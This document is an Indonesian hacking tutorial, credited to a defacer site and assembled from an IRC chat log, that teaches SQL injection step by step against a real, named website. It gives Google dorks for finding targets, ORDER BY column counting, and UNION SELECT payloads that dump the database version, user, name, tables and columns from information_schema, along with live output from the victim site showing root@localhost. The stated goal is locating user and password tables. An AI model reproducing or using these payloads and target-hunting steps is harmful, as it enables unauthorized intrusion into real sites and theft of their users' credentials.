dasar² hacking website dengan sql (level I)

###########################################
###########################################
###########################################
# #
# credits : bL4Ck_3n91n3 #
# edited by shinichi kudo [at] http://defacer.biz #
# hasil chat di #manadocoding [at] Dal.Net #
# #
###########################################
###########################################
###########################################

hehe..
udah dapet izin dari om bL4Ck_3n91n3 neh..

ini cuma rangkuman dari pembicaraan ane ajah ma dia tongue

so..ane juga blum paham bener,,
bisa ditanyakan lebih lanjut ma yang berwenang dan lebih paham tentang ini..

langsung ajah..

###########################################

rangkumannya :
1. cari target
2. cari bugs sql'e dengan menambahkan tanda petik satu (') pada akhir URL'e
3. kalo muncul tulisan 'You have an error in your SQL syntax' , artinya web itu ada bugs sql'e..
4. lanjut
cara nyari targetnya :
1. buka google
2. tulis keywordnya seperti ini : inurl:page.php

pada kasus ini hilang tulisan itu pada angka 4, yang artinya jumlahnya ada 4

spoiler

[02:19] alias kita bisa nyari nama tabel ama kolom username & password
[02:19] caranya lumayan ribet
[02:19] nah..
[02:19] itu dia tuh..
[02:19] trus
[02:20] mentok disitu terus..
[02:20] tongue
[02:20] ribet caranya
[02:20] trus butuh kesabaran
[02:20] tingkat tinggi
[02:20] seep..
[02:20] jadi biasanya aku extract
[02:20] untung saya orang sabar..
[02:20] biar gak terlalu lama
[02:20] gmn extract;e?
[02:21] ada toolsnya
[02:21] tapi gak usah dolo
[02:21] itu nanti aza
[02:21] so..
[02:21] kumaha dunk>?
[02:21] yang penting harus tau cara dasarnya
[02:22] iyah..
[02:22] http://www.davidheathcoatamory.co.uk/page.php?pid=-99+union+select+table_name,2,3,4+from+information_schema.tables/*
[02:22] nah gitu
[02:22] harap di ingat
[02:22] okey..
[02:22] information_schema.tables
[02:22] table_name
[02:22] itu buat nyari tabel
[02:22] kalo buat nyari kolom
[02:23] tinggal di ganti aza
[02:23] column_name
[02:23] seep..
[02:23] information_schema.columns
[02:23] nah
[02:23] http://www.davidheathcoatamory.co.uk/page.php?pid=-99+union+select+table_name,2,3,4+from+information_schema.tables/*
[02:23] disitu
[02:23] dah keluar semua nama tabelnya
[02:23] iyah..
[02:23] muncul tuh banyak..
[02:24] loe cari deh yang mana menurut loe ada passwordnya
[02:24] klo yang ini ? phpbb_users
[02:25] hhmm...
[02:25] tapi itu keknya forum'e yah?
[02:25] biggrin
[02:25] iya
[02:25] itu kolom phpbb
[02:25] iyah..
[02:25] biggrin
[02:25] pake ctrl + f aza
[02:26] ctrl + f
[02:26] tulis admin
[02:26] user_admin
[02:26] itu yang menurut gue terdekat..
[02:27] tapi itu keknya phpbb juga yaa??
[02:27] biggrin
[02:27] hu`uh
[02:27] hehehe..
[02:27] langsung aza
[02:27] abaikan aza dolo
[02:27] sekarang coba paste url buat nyari kolom
[02:28] tadi kan buat nyari tabel
[02:28] seep..
[02:28] sekarang buat nyari kolom
[02:28] seep..
[02:28] udah..
[02:28] paste ke sini
[02:28] aQ mau liat
[02:28] dah bener apa blom
[02:29] http://www.davidheathcoatamory.co.uk/page.php?pid=-99+union+select+table_name,2,3,4+from+information_schema.columns/*
[02:29] masih salah
[02:29] +select+table_name,
[02:29] itunya juga diubah
[02:29] column_name
[02:29] oia..
[02:29] biggrin
[02:29] nah
[02:30] dah bisa nyari tabel ama kolom
[02:30] http://www.davidheathcoatamory.co.uk/page.php?pid=-99+union+select+column_name,2,3,4+from+information_schema.columns/*
[02:30] extractnya pake tools aza
[02:30] soalnya dah bisa dasar

[02:05] lanjut boss..
[02:06] kita cari tahu jumlah tabelnya
[02:06] pake order by
[02:06] tapi
[02:06] tapi apa?
[02:06] angka artikelnya ubah ke angka yang gak valid
[02:06] angka yang gak valid itu
[02:06] minus
[02:06] -10
[02:06] -99
[02:06] jadinya?
[02:06] dll....
[02:06] http://www.davidheathcoatamory.co.uk/page.php?pid=-99
[02:06] kek gitu deh
[02:07] oke kita cari tahu tabelnya
[02:07] caranya
[02:07] oh..
[02:07] http://www.davidheathcoatamory.co.uk/page.php?pid=-99+order+by+10/*
[02:07] nah gitu
[02:07] order by 10
[02:07] maksudnya kita nebak
[02:07] apakah ada tabel 10 atau tidak
[02:07] ngga ada..
[02:08] Unknown column '10' in 'order clause'
[02:08] nah seperti itu
[02:08] iyah..
[02:08] berarti jumlah tabelnya kurang dari 10
[02:08] ada kek gitu..
[02:08] http://www.davidheathcoatamory.co.uk/page.php?pid=-99+order+by+9/*
[02:08] coba angka2 dibawahnya
[02:08] berarti kita tebak2 terus yah?
[02:08] iya
[02:08] angka2 yang dibawahnya aza
[02:09] sampe erorr kek tadi hilang
[02:09] okey..
[02:09] dicoba dulu..
[02:09] sep
[02:10] Unknown column '5' in 'order clause'
[02:10] coba lagi dibawahnya
[02:10] yang 4.. Sorry, no records were found!
[02:10] sampe ilang error seperti itu
[02:10] nah
[02:10] itu
[02:10] itu yang ada..
[02:10] betul itu?
[02:10] Unknown column '5' in 'order clause' <=- intinya error seperti ini dah hilang [02:10] iyah..
[02:10] seep..

rangakumannya : (perhatiin baik² neh klo yang ini)
1. cari tabel dengan perintah ( pid=-99+union+select+table_name,2,3,4+from+information_schema.tables/* )
2. cari kolom dengan perintah ( pid=-99+union+select+column_name,2,3,4+from+information_schema.columns/* )

###########################################

selanjutnya nanti dulu yah..

pahami dasarnya dulu

sesuai judulnya..

cuma dasarnya ajagh..

hanya tuk penetrasi ajah qo..

cara hackingnya di-share terpisah
pokoknya harus tau dasarnya dulu yah..

sabar buuuuuuuu

[02:12] kita pake angka 1
[02:12] soalnya fontnya besar
[02:12] uh..hu..
[02:12] so..
[02:12] kita cari tahu versinya
[02:12] gmn?
[02:12] http://www.davidheathcoatamory.co.uk/page.php?pid=-99+union+select+version(),2,3,4/*
[02:12] kalo mau cari tahu nama database
[02:13] database()
[02:13] okey.
[02:13] http://www.davidheathcoatamory.co.uk/pa … t+database(),2,3,4/*
[02:13] untuk nge gabungin
[02:13] 5.0.22-Debian_0ubuntu6.06.10-log
[02:13] untuk nge gabungin
[02:13] pake concat
[02:13] kalo semisalnya gabungin 2 query
[02:13] concat
[02:13] kalo lebih dari 2
[02:13] iyah..gmn?
[02:13] pake concat_ws
[02:13] neh contoh
[02:14] kamu mau nyari tahu versi ama nama databasenya secara bersamaan
[02:14] pake concat
[02:14] iya...
[02:14] so gmn tuh?
[02:14] http://www.davidheathcoatamory.co.uk/page.php?pid=-99+union+select+concat(version(),0x3a,database()),2,3,4/*
[02:14] kek gitu
[02:14] 0x3a <=- ini pemisah [02:15] coba deh dibuka
[02:15] udah..
[02:15] 5.0.22-Debian_0ubuntu6.06.10-log:davidheathcoatamory_com
[02:15] 5.0.22-Debian_0ubuntu6.06.10-log:davidheathcoatamory_com
[02:15] hu`uh
[02:15] itu ada tanda :
[02:15] log:david
[02:15] buat memisahkan
[02:15] oooh..
[02:15] jadi kalo gak pake 0x3a
[02:15] tanda titik duanya hilang
[02:16] jadi gak bisa di bedain
[02:16] oh gitu..
[02:16] smile
[02:16] nah..
[02:16] kalo seumpanya mau gabungin 3 sekaligus
[02:16] telus gmn boss?
[02:16] wedew..
[02:16] pake concat_ws
[02:16] pake itu'a 2 kali dunk?
[02:16] oh..
[02:16] biggrin
[02:16] contohnya gmn?
[02:16] http://www.davidheathcoatamory.co.uk/page.php?pid=-99+union+select+concat_ws(user(),0x3aversion(),0x3a,database()),2,3,4/*
[02:17] salah
[02:17] http://www.davidheathcoatamory.co.uk/page.php?pid=-99+union+select+concat_ws(user(),0x3a,version(),0x3a,database()),2,3,4/*
[02:17] nah gitu
[02:17] oh..
[02:17] atau
[02:17] kalo gak mau nulis 0x3a dua kali
[02:17] taruh di pinggir aza
[02:18] http://www.davidheathcoatamory.co.uk/page.php?pid=-99+union+select+concat_ws(0x3a,version(),user(),database()),2,3,4/*
[02:18] kek gitu
[02:18] cuman sekali nulis 0x3a
[02:18] munculnya gini klo pake yang pertama :root@localhost5.0.22-Debian_0ubuntu6.06.10-logroot@localhost:root@localhostdavidheathcoatamory_com
[02:18] iya
[02:18] lebih ribet
[02:18] klo yang kedua 5.0.22-Debian_0ubuntu6.06.10-log:root@localhost:davidheathcoatamory_com
[02:19] lebih enak..
[02:19] biggrin
[02:19] iya
[02:19] next
[02:19] seep..
[02:19] soalnya ini versi 5
[02:19] jadi bisa di schema
[02:19] caranya?